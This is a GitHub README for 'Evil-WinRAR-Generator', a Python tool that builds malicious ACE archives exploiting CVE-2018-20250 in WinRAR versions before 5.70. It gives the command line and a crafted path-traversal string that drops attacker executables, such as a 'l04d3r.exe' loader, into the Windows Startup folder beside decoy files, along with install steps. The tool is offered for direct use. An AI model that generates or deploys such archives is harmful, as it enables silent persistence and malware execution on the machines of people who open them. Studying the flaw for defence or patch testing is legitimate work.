Skip to content

manulqwerty/Evil-WinRAR-Gen

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Evil-WinRAR-Generator

Python 3.6 License: GPL v3 Twitter

Generator of malicious Ace files for WinRAR < 5.70 beta 1

Vulnerability by research.checkpoint.com

Developed by @manulqwerty - IronHackers.

Usage

Help:

./evilWinRAR.py -h

Generate a malicius archive:

Rar filename: evil.rar

Evil path: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Evil files: calc.exe , l04d3r.exe

Good files: hello.txt , cats.jpeg

./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'

Instalation

You can download Evil-WinRAR-Generator by cloning the Git repository:

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen && pip3 install -r requirements.txt
chmod +x evilWinRAR.py

Evil-WinRAR-Generator works out of the box with Python version 3.x on any platform.

Proof of Concept (CVE-2018-20250)

IMAGE ALT TEXT HERE

Screenshots

Screenshot Screenshot

Credits

https://github.com/droe/acefile

https://github.com/WyAtu/CVE-2018-20250

Colaborators:

cybervaca

About

Generator of malicious Ace files for WinRAR < 5.70 beta 1

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages